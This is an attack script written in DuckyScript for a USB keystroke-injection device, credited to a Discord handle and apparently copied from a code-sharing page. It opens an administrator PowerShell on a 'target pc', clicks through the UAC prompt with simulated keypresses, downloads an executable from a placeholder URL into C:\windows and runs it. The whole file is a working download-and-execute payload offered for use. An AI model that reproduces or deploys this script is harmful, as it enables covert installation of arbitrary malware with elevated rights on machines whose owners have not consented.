19 lines
510 B
Plaintext
19 lines
510 B
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Downloads an .exe file from the URL and runs it on the target pc.
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 950
|
|
WINDOWS r
|
|
DELAY 650
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 850
|
|
ALT y
|
|
DELAY 1200
|
|
STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
|
|
ENTER |